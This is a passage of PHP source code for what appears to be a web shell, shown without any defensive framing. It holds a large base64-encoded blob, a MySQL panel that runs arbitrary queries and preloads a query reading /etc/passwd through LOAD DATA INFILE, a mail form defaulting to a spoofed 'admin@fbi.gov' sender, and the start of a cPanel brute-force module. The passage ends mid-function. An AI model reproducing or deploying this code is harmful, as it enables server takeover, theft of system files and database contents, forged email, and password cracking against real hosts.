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')));;echo '</textarea>
</td>
</tr>
<tr>
<td>
						<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
              				</td>
				</tr>
			</table>
			</form>
			';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'mysql'))
{
if(isset($_GET['sqlhost']) &&isset($_GET['sqluser']) &&isset($_GET['sqlpass']) &&isset($_GET['sqlport']))
{
$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];
if($con = @mysql_connect($sqlhost.':'.$sqlport,$sqluser,$sqlpass))
{
$msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
$msg .= '<p>Connected to '.$sqluser."<span class=\"gaya\">@</span>".$sqlhost.':'.$sqlport;
$msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd.'&amp;x=mysql&amp;
                   				sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
                   				sqlpass='.$sqlpass.'&amp;
                   				sqlport='.$sqlport."&amp;\">[ databases ]</a>";
if(isset($_GET['db']))
$msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
                   					<a href=\"y=".$pwd.'&amp;x=mysql&amp;
                   					sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
                   					sqlpass='.$sqlpass.'&amp;
                   					sqlport='.$sqlport.'&amp;
                   					db='.$_GET['db']."\">".htmlspecialchars($_GET['db']).'</a>';
if(isset($_GET['table']))
$msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
                   					</span>&nbsp;&nbsp;
                   					<a href=\"y=".$pwd.'&amp;x=mysql&amp;
                   					sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;
                   					sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;
                   					db='.$_GET['db'].'&amp;
                   					table='.$_GET['table']."\">".htmlspecialchars($_GET['table']).'</a>';
$msg .= '</p><p>version : '.mysql_get_server_info($con).' proto '.mysql_get_proto_info($con).'</p>';
$msg .= '</div>';
echo $msg;
if(isset($_GET['db']) &&(!isset($_GET['table'])) &&(!isset($_GET['sqlquery'])))
{
$db = $_GET['db'];
$query = "DROP TABLE IF EXISTS CyberSEC_table;
                   					\nCREATE TABLE `CyberSEC_table` ( `file` LONGBLOB NOT NULL );
                   					\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM CyberSEC_table;
                   					\nDROP TABLE IF EXISTS CyberSEC_table;";
$msg = "<div style=\"width:99%;padding:0 10px;\">
									<form action=\"?\" method=\"get\">
										<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
										<input type=\"hidden\" name=\"x\" value=\"mysql\" />
										<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
										<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
										<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
										<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
										<input type=\"hidden\" name=\"db\" value=\"".$db."\" />
										<p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
										<p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
									</form>
								</div> ";
$tables = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db.'</th></tr>';
$hasil = @mysql_list_tables($db,$con);
while(list($table) = @mysql_fetch_row($hasil))
{@array_push($tables,$table);}
@sort($tables);
foreach($tables as $table)
{
$msg .= "<tr><td><a href=\"?y=".$pwd.'&amp;x=mysql&amp;sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;db='.$db.'&amp;table='.$table."\">$table</a></td></tr>";
}
$msg .= '</table>';
}
elseif(isset($_GET['table']) &&(!isset($_GET['sqlquery'])))
{
$db = $_GET['db'];
$table = $_GET['table'];
$query = 'SELECT * FROM '.$db.'.'.$table.' LIMIT 0,100;';
$msgq = "<div style=\"width:99%;padding:0 10px;\">
									<form action=\"?\" method=\"get\">
										<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
										<input type=\"hidden\" name=\"x\" value=\"mysql\" />
										<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
										<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
										<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
										<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
										<input type=\"hidden\" name=\"db\" value=\"".$db."\" />
										<input type=\"hidden\" name=\"table\" value=\"".$table."\" />
										<p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
										<p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
									</form>
								</div> ";
$columns = array();
$msg = "<table class=\"explore\" style=\"width:99%;\">";
$hasil = @mysql_query('SHOW FIELDS FROM '.$db.'.'.$table);
while(list($column) = @mysql_fetch_row($hasil))
{
$msg .= "<th>$column</th>";$kolum = $column;
}
$msg .= '</tr>';
$hasil = @mysql_query('SELECT count(*) FROM '.$db.'.'.$table);
list($total) = mysql_fetch_row($hasil);
if(isset($_GET['z'])) $page = (int) $_GET['z'];
else $page = 1;
$pagenum = 100;
$totpage = ceil($total / $pagenum);
$start = (($page -1) * $pagenum);
$hasil = @mysql_query('SELECT * FROM '.$db.'.'.$table.' LIMIT '.$start.','.$pagenum);
while($datas = @mysql_fetch_assoc($hasil))
{
$msg .= '<tr>';
foreach($datas as $data){if(trim($data) == '') $data = '&nbsp;';$msg .= "<td>$data</td>";}
$msg .= '</tr>';
}
$msg .= '</table>';
$head = "<div style=\"padding:10px 0 0 6px;\">
									<form action=\"?\" method=\"get\">
										<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
										<input type=\"hidden\" name=\"x\" value=\"mysql\" />
										<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
										<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
										<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
										<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
										<input type=\"hidden\" name=\"db\" value=\"".$db."\" />
										<input type=\"hidden\" name=\"table\" value=\"".$table."\" />
										Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
for($i = 1;$i <= $totpage;$i++)
{
$head .= "<option value=\"".$i."\">".$i.'</option>';
if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i.'</option>';
}
$head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
$msg = $msgq.$head.$msg;
}
elseif(isset($_GET['submitquery']) &&($_GET['sqlquery'] != ''))
{
$db = $_GET['db'];
$query = magicboom($_GET['sqlquery']);
$msg = "<div style=\"width:99%;padding:0 10px;\">
								<form action=\"?\" method=\"get\">
									<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
									<input type=\"hidden\" name=\"x\" value=\"mysql\" />
									<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
									<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
									<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
									<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
									<input type=\"hidden\" name=\"db\" value=\"".$db."\" />
									<p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
									<p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
								</form>
							</div> ";
@mysql_select_db($db);
$querys = explode(';',$query);
foreach($querys as $query)
{
if(trim($query) != '')
{
$hasil = mysql_query($query);
if($hasil)
{
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
										<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= '<th>'.htmlspecialchars(@mysql_field_name($hasil,$i)).'</th>';
$msg .= '</tr>';
for($i=0;$i<@mysql_num_rows($hasil);$i++)
{
$rows=@mysql_fetch_array($hasil);
$msg .= '<tr>';
for($j=0;$j<@mysql_num_fields($hasil);$j++)
{
if($rows[$j] == '') $dataz = '&nbsp;';
else $dataz = $rows[$j];
$msg .= '<td>'.$dataz.'</td>';
}
$msg .= '</tr>';
}
$msg .= '</table>';
}
else
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
else
{
$query = "SHOW PROCESSLIST;\n
							SHOW VARIABLES;\n
							SHOW STATUS;";
$msg = "<div style=\"width:99%;padding:0 10px;\">
							<form action=\"?\" method=\"get\">
								<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
								<input type=\"hidden\" name=\"x\" value=\"mysql\" />
								<input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
								<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
								<input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
								<input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
								<input type=\"hidden\" name=\"db\" value=\"".$db."\" />
								<p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
								<p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
							</form>
							</div> ";
$dbs = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
$hasil = @mysql_list_dbs($con);
while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);}
@sort($dbs);
foreach($dbs as $db)
{
$msg .= "<tr><td><a href=\"?y=".$pwd.'&amp;x=mysql&amp;sqlhost='.$sqlhost.'&amp;sqluser='.$sqluser.'&amp;sqlpass='.$sqlpass.'&amp;sqlport='.$sqlport.'&amp;db='.$db."\">$db</a></td></tr>";
}
$msg .= '</table>';
}
@mysql_close($con);
}
else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
echo $msg;
}
else
{
;echo '
				<form action="?" method="get">
				<input type="hidden" name="y" value="';echo $pwd;;echo '" />
				<input type="hidden" name="x" value="mysql" />
				<table class="tabnet" style="width:300px;">
					<tr>
						<th colspan="2">Connect to mySQL server</th>
					</tr>
					<tr>
						<td>&nbsp;&nbsp;Host</td>
						<td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
					</tr>
					<tr>
						<td>&nbsp;&nbsp;Username</td>
						<td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
					</tr>
					<tr>
						<td>&nbsp;&nbsp;Password</td>
						<td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
					</tr>
					<tr>
						<td>&nbsp;&nbsp;Port</td>
						<td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
					</tr>
				</table>
				</form>
				';
}
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'mail'))
{
if(isset($_POST['mail_send']))
{
$mail_to = $_POST['mail_to'];
$mail_from = $_POST['mail_from'];
$mail_subject = $_POST['mail_subject'];
$mail_content = magicboom($_POST['mail_content']);
if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
{$msg = "email sent to $mail_to";}
else $msg = 'send email failed';
}
;echo '
			<form action="?y=';echo $pwd;;echo '&amp;x=mail" method="post">
				<table class="cmdbox">
					<tr>
						<td>
							<textarea class="output" name="mail_content" id="cmd" style="height:340px;">**</textarea>
						</td>
					</tr>
					<tr>
						<td>
							&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to
						</td>
					</tr>
					<tr>
						<td>
							&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@fbi.gov" name="mail_from" />
							&nbsp; from
						</td>
					</tr>
					<tr>
						<td>
							&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
						</td>
					</tr>
					<tr>
						<td>
							&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
						</td>
					</tr>
					<tr>
						<td>&nbsp;&nbsp;&nbsp;&nbsp;';echo $msg;;echo '						</td>
					</tr>
				</table>
			</form>
			';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'brute'))
{
;echo '				<form action="?y=';echo $pwd;;echo '&amp;x=brute" method="post">
			';
@ini_set('memory_limit',999999999999);
$connect_timeout=5;
@set_time_limit(0);
$pokeng 	= $_REQUEST['submit'];
$hn 		= $_REQUEST['users'];
$crew 		= $_REQUEST['passwords'];
$pasti 		= $_REQUEST['sasaran'];
$manualtarget 	= $_REQUEST['target'];
$bisa 		= $_REQUEST['option'];
if($pasti == ''){
$pasti = 'localhost';
}
if($manualtarget == ''){
$manualtarget = 'http://localhost:2082';
}
function get_users()
{
$users = array();
